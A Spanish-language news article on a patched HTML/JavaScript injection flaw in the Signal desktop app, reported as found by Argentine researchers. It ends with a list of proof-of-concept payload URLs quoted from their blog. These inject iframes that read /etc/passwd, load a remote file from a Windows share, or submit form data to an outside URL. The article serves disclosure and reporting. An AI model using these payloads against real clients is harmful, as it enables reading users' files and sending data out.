Hackers revelan como funciona la vulnerabilidad de Signal

Posterior a la revelación de la ultima vulnerabilidad de PGP, ahora fue revelado el funcionamiento de la ultima vulnerabilidad critica sobre la Aplicación de Escritorio llamada Signal, la cual permite ejecución de código remoto.

De acuerdo a lo mencionado en el blog del Investigador, la vulnerabilidad fue descubierta accidentalmente mientras los investigadores Argentinos, Iván Barrera, Alfredo Ortega y Juliano Rizzo, chateaban y uno de ellos envio un link vulnerable a XSS en la URL, y este se ejecuto dentro de la aplicación de Signal de escritorio.


Después del análisis y el alcance de esta falla, se probaron varios sitios con XSS y los investigadores encontraron que la vulnerabilidad reside en como la aplicación maneja los links compartidos, permitiendo a los atacantes inyectar código HTML / JavaScript definido por el usuario a través de iFrame, imagen, video y etiquetas de audio.

Usando esta vulnerabilidad, un atacante puede inyectar código desde el chat, logrando robar información usando ingeniería social.



La vulnerabilidad fue parchada inmediatamente por los desarrolladores de Signal, después de que se publicara la prueba de concepto por parte de Ortega el ultimo fin de semana.

Algunos ejemplos de explotación de la vulnerabilidad tomadas desde el blog

  • Show the user’s /etc/passwd content (or any other file):
    http://hacktheplanet/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PWONED
  • Include and execute a remote JavaScript file (for Windows clients):
    http://hacktheplanet/?p=%3d%3Ciframe%20src=\\DESKTOP-XXXXX\Temp\test.html%3E
  • Load signal inside signal (this may crash):
    http://hacktheplanet/?p=%3Ciframe%20src="background.html"%3E%3C/iframe%3E%20PWONED
  • Show message in an iframe:
    http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E
  • Play an audio file (you’ll hear a dog bark if you have gnome desktop or derived):
    http://hacktheplanet/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E
  • Play a video file (you’ll see a how-to configure dual monitor if you have gnome desktop or derived):
    http://hacktheplanet/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E
  • Display a form, and send some data:
    http://hacktheplanet/?p=%3Cform%20method='POST'%20action='https://some.real/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E